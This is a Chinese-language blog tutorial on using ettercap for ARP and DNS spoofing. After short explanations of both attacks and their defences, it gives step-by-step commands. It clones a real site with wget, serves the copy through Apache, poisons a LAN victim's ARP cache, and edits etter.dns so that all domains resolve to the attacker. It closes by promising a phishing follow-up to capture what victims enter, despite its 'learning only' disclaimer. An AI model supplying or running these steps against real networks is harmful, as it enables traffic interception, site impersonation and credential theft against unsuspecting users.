ettercap做arp欺骗和dns欺骗-----详细教程

本教程仅供学习使用，不得用于非法途径，我概不负责！！！！！！

一年前玩过ettercap做arp欺骗和dns欺骗的实验，都忘记怎么操作的了，哈哈，现在重新整理下资料，方便小伙伴学习。

 

• 工具介绍：

          Ettercap：刚开始只是作为一个网络嗅探器，但在开发过程中，它获得了越来越多的功能，在中间的攻击人方面，是一个强大而又灵活的工具。它支持很多种协议（即使是加密的），包括网络和主机产品特征分析，还有dns欺骗等等。

          wget ： 非常强大的站点拷贝工具和httrack类似，linux一般都自带wget，说白了我就是用它克隆别人的网站，把别人网站源代码和网站的文件拷贝下来自己用，其他功能自行科普。

          HTTrack：是一个免费并易于使用的线下浏览器工具，它能够让你从互联网上下载整个网站进行线下浏览。浏览线下站点和线上并没有什么不同。HTTrack同样可以进行线下线上站点同步，支持断点续传。HTTrack是一个可全面配置并包括全面的帮助系统的工具。

         nmap ：一是探测一组主机是否在线；其次是扫描 主机端口，嗅探所提供的网络服务；还可以推断主机所用的操作系统 。如果只是探测存活主机，用个shell脚本就可以实现，点击  我的shell脚本。

 

• 原理讲解（不看可跳过，看后面实例）

         arp欺骗：

       arp欺骗讲解：B（192.168.1.10）主机发送数据到哪里都是根据本机arp表和路由表判定的，比如向局域网内或局域网外发送数据，都会通过自己的默认网关转发数据，本地arp表会不定时的刷新ip--mac关系，在本地arp表没有网关192.168.1.1的mac信息时，会发送广播问谁的ip地址是192.168.1.1，这个时候局域网所有主机都会收到这条信息，正常情况下应该是192.168.1.1将mac地址回应给主机B刷新arp表，但是这时候主机A（192.168.1.5）回应说自己就是192.168.1.1，并将mac返回给主机B刷新B的arp表，主机B的arp里对应信息为这样  192.168.1.1-------主机B（192.168.1.5）的mac，得到了网关的mac后就开始传输真正的数据了，数据包封装上  源（主机B）mac   目的为网关mac（实际是主机A的mac），  交换机是这样转发：交换机有个CAM表，存放交换机物理端口和mac对应关系，拆解数据包，看该数据包的目的mac是谁，然后根据cam表转发到对应的端口，由于封装的目的mac是主机A的mac，所以本来发给网关的数据，现在发给了主机A，这就是一个欺骗。主机A不仅仅欺骗主机A，它还会欺骗网关，说自己就是主机B。

       简单原理：

              主机A说自己是网关，骗将发给网关的数据发给主机A，然后由主机A发送给真正的网关。

              主机A告诉网关它就是主机B，骗将发给B的数据发给主机A，然后由A转发给主机B。

    如何防止arp欺骗：

               绑定静态的arp表，静态arp表有个弊端就是，如果你绑定的那台旧主机拆走了，接进来另外一台新主机，而你的arp表存的旧主机的mac，这样数据包就转发不出去了，很坑吧，哈哈。

 

DNS欺骗：

            其实DNS欺骗不能叫欺骗，为什么这么说，因为dns解析采取就近原则，意思是说谁能先帮我解析我就听谁的。给你解析一个假的ip就是欺骗。例如本来www.baidu.com 对应ip是202.16.25.78    ，你在本地架设一个dns服务器将www.baidu.com 解析为192.168.100.2 , 这不就等于骗了别人吗。

            dns解析过程是这样的：先通过本机的host文件解析，如果不能解析，就让最近的dns服务器解析  。其实dns解析还分为递归解析和迭代解析。这里不解释。

          如何防止dns欺骗：

                     直接修改自己的host文件，将你访问的域名和ip地址直接写到里面，这样就不用通过dns服务器了，也就无法被骗 。

 

实验干货

前提：

               你和你要欺骗的主机在同一局域网。

               你所在局域网没有被划分vlan。

    1、搭建环境

             如果你是虚拟机想测试主机所在局域网如下选择（VMwar）

           

设置kali的网卡模式为dhcp

       

2、wget克隆网站

             命令格式：wget  -d -r -c  url地址

          

           下载完后会在当前目录下创建和url同名的文件夹

3、将网站源文件放到httpd的默认文件夹下  /var/www/  

       

         注意：一定要将index.html 的那层目录存在/var/www/下

 

4、开始arp欺骗

        命令格式：

                    ettercap -Tq -i  网卡   -M arp:remote /要欺骗的ip// /网关ip//

          提示：有线网卡一般为eth0，如果你挂载了外接的无限网卡一般为wlan0

         欺骗的主机是192.168.43.10  ,网关是192.168.43.1 

     

 5、重要一步：修改  vim /etc/ettercap/etter.dns

           追加格式例如 ：

            www.baidu.com      A       192.168.43.133（写本机的ip）     ##将www.baidu.com 解析到本机

            *.*.*                         A        192.168.43.133                            ##将所有域名解析到本机

       

 6、开始dns欺骗

         命令格式：

                     ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /要欺骗的ip// /网关的ip//

       

 7、开启Apache服务

         命令：

            service apache2 start

        

 8、检验成果

           让被欺骗的那个主机浏览器任意输入一个域名，会发现显示的都是你的网站界面。

 

表演到此结束。

 

后期会分享利用sookit来监听别人在我的网站上输入的信息，所谓的钓鱼网站制作。

 

 

请不要用于非法用途！！！！！！！！！！！！！！！！！！！